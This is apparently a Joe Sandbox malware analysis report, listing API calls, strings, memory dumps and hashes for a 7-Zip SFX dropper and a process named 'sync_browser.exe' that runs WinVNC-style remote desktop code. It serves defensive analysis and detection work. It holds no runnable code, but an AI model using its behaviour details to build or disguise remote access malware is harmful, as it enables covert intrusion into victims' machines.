Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
GetDlgItem.USER32(?,000004B7), ref: 00408A97
SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
String ID:
API String ID: 3043669009-0
Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54

Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
GetSystemMetrics.USER32(00000031), ref: 004070E8
CreateFontIndirectW.GDI32(?), ref: 004070F7
DeleteObject.GDI32(00000000), ref: 00407126

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94

Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 004085B0
GetClientRect.USER32(?,?), ref: 004085C2
PtInRect.USER32(?,?,?), ref: 004085D1

Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6

CallNextHookEx.USER32(?,?,?), ref: 004085F3

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49

Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
SetWindowTextW.USER32(?,?), ref: 0040417D
??3@YAXPAX@Z.MSVCRT(?), ref: 00404188

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@TextWindow$Length
String ID:
API String ID: 2308334395-0
Opcode ID: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
Opcode Fuzzy Hash: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98

Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407931
CreateFontIndirectW.GDI32(?), ref: 00407947
GetDlgItem.USER32(?,000004B5), ref: 0040795B
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69

Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00401D92
GetWindowRect.USER32(?,?), ref: 00401DAB
ScreenToClient.USER32(00000000,?), ref: 00401DB9
ScreenToClient.USER32(00000000,?), ref: 00401DC0

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5

Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C

Strings

{D@, xrefs: 00411FD8, 00411FEF, 00412002, 00412187, 00412197, 00412276
(nA, xrefs: 00411F5C

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@
String ID: (nA${D@
API String ID: 613200358-2741945119
Opcode ID: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
Opcode Fuzzy Hash: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48

Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574

??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36

Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E

Strings

{D@, xrefs: 00411C15, 00411C44, 00411C56

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: {D@
API String ID: 4294387087-1160549682
Opcode ID: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
Opcode Fuzzy Hash: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94

Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00404310

Strings

^L@, xrefs: 004042EB, 0040430F
GUIFlags, xrefs: 004042EF

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: _wtol
String ID: GUIFlags$^L@
API String ID: 2131799477-2609156739
Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D

Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00407EEF
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00407F17

Strings

(%d%s), xrefs: 00407EE9

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@wsprintf
String ID: (%d%s)
API String ID: 3815514257-2087557067
Opcode ID: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
Opcode Fuzzy Hash: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98

Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(?), ref: 004030FB
GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

Strings

t1@, xrefs: 00403114

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: TextWindow$Length
String ID: t1@
API String ID: 1006428111-473456572
Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90

Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472

Strings

Could not allocate memory, xrefs: 0040446B
7-Zip SFX, xrefs: 00404466

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

Analysis Process: sync_browser.exePID: 2624, Parent PID: 7612COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.6%
Total number of Nodes:	1092
Total number of Limit Nodes:	29

Executed Functions

Function 00007FF67E7E36D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895librarythreadsleepCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE ref: 00007FF67E7E371A
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7E3764
GetThreadDesktop.USER32 ref: 00007FF67E7E376C
_snprintf.LIBCMT ref: 00007FF67E7E3820
free.LIBCMT ref: 00007FF67E7E3862
free.LIBCMT ref: 00007FF67E7E386F
SleepEx.KERNELBASE ref: 00007FF67E7E38D5
timeGetTime.WINMM ref: 00007FF67E7E3A99
EnterCriticalSection.KERNEL32 ref: 00007FF67E7E3ADF
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E3B11
GetComputerNameA.KERNEL32 ref: 00007FF67E7E3BDC
gethostname.WS2_32 ref: 00007FF67E7E3C8D
EnterCriticalSection.KERNEL32 ref: 00007FF67E7E3F3D
CreateRectRgn.GDI32 ref: 00007FF67E7E3F70
DeleteObject.GDI32 ref: 00007FF67E7E3F9B
free.LIBCMT ref: 00007FF67E7E3FA5
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E3FAE

Part of subcall function 00007FF67E857D90: EnterCriticalSection.KERNEL32(?,?,?,00007FF67E7E3FBC), ref: 00007FF67E857DA1
Part of subcall function 00007FF67E857D90: SetThreadPriority.KERNEL32(?,?,?,00007FF67E7E3FBC), ref: 00007FF67E857DD5
Part of subcall function 00007FF67E857D90: GetLastError.KERNEL32(?,?,?,00007FF67E7E3FBC), ref: 00007FF67E857DDF

GetTickCount.KERNEL32 ref: 00007FF67E7E41B3

Part of subcall function 00007FF67E82A5B0: GetCurrentThreadId.KERNEL32 ref: 00007FF67E82A5E1
Part of subcall function 00007FF67E82A5B0: GetThreadDesktop.USER32 ref: 00007FF67E82A5E9
Part of subcall function 00007FF67E82A5B0: OpenInputDesktop.USER32 ref: 00007FF67E82A5FC

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
CloseDesktop.USER32 ref: 00007FF67E7E7C4A
Sleep.KERNEL32 ref: 00007FF67E7E7C8F
FlushFileBuffers.KERNEL32 ref: 00007FF67E7E7CBC
CloseHandle.KERNEL32 ref: 00007FF67E7E7CE6
FlushFileBuffers.KERNEL32 ref: 00007FF67E7E7D1E
CloseHandle.KERNEL32 ref: 00007FF67E7E7D48
CloseDesktop.USER32 ref: 00007FF67E7E7D9D
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7E7E0B
LoadLibraryA.KERNEL32 ref: 00007FF67E7E7E5D

Part of subcall function 00007FF67E82A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF67E82A3E3
Part of subcall function 00007FF67E82A3B0: GetThreadDesktop.USER32 ref: 00007FF67E82A3EB
Part of subcall function 00007FF67E82A3B0: GetUserObjectInformationA.USER32 ref: 00007FF67E82A411

GetProcAddress.KERNEL32 ref: 00007FF67E7E7E75
FreeLibrary.KERNEL32 ref: 00007FF67E7E7E97

Strings

Could not connect using %s!, xrefs: 00007FF67E7E37F5
- , xrefs: 00007FF67E7E3D62
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF67E7E7C66
vncclient.cpp : PostAddNewClient II, xrefs: 00007FF67E7E7F29
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
Host name unavailable, xrefs: 00007FF67E7E3CA1
vncclient.cpp : negotiated version, xrefs: 00007FF67E7E39F9
vncclient.cpp : client disconnected : %s (%hd), xrefs: 00007FF67E7E7DE6
LOGEXIT, xrefs: 00007FF67E7E7E6B
( , xrefs: 00007FF67E7E3CF4
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029
Could not connect to %s!, xrefs: 00007FF67E7E380D
vncclient.cpp : PostAddNewClient I, xrefs: 00007FF67E7E3932
\logging.dll, xrefs: 00007FF67E7E7E38
vncclient.cpp : authenticated connection, xrefs: 00007FF67E7E3A76
service mode, xrefs: 00007FF67E7E3D82
vncclient.cpp : client connected : %s (%hd), xrefs: 00007FF67E7E374A
WinVNC, xrefs: 00007FF67E7E3C5C
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
application mode, xrefs: 00007FF67E7E3DA2
vncservice.cpp : PostAddNewClient failed, xrefs: 00007FF67E7E39CA
vncclient.cpp : failed to close desktop, xrefs: 00007FF67E7E7DA7
vncclient.cpp : sent pixel format to client, xrefs: 00007FF67E7E3EF5
vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF67E7E7C54

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 459429253-3399855497
Opcode ID: fe95b472391574baf351958184c564c7a4f4164416ccc65e9b7f2c941ff69469
Instruction ID: 7d4f9c2cd26a3984c5a4a9f864f8dccf1b6fe2f50c5c02bd1f093b237caa8774
Opcode Fuzzy Hash: fe95b472391574baf351958184c564c7a4f4164416ccc65e9b7f2c941ff69469
Instruction Fuzzy Hash: C8A29D27A18A8185EB50CB29C848BFE77A5FB94B94F058232EA5D877E5DF3CD449C700

Function 00007FF67E829BC0 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 105
libraryloaderprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E829C03
GetProcAddress.KERNEL32 ref: 00007FF67E829C1B
GetProcAddress.KERNEL32 ref: 00007FF67E829C2E
GetSystemMetrics.USER32 ref: 00007FF67E829C4E
GetCurrentProcessId.KERNEL32 ref: 00007FF67E829C61
ProcessIdToSessionId.KERNEL32 ref: 00007FF67E829C76
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF67E829C85
Process32First.KERNEL32 ref: 00007FF67E829CA4
CloseHandle.KERNEL32 ref: 00007FF67E829CB1
FreeLibrary.KERNEL32 ref: 00007FF67E829CBF

Strings

explorer.exe, xrefs: 00007FF67E829CD0
WTSGetActiveConsoleSessionId, xrefs: 00007FF67E829C11
kernel32.dll, xrefs: 00007FF67E829BF2
ProcessIdToSessionId, xrefs: 00007FF67E829C21

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
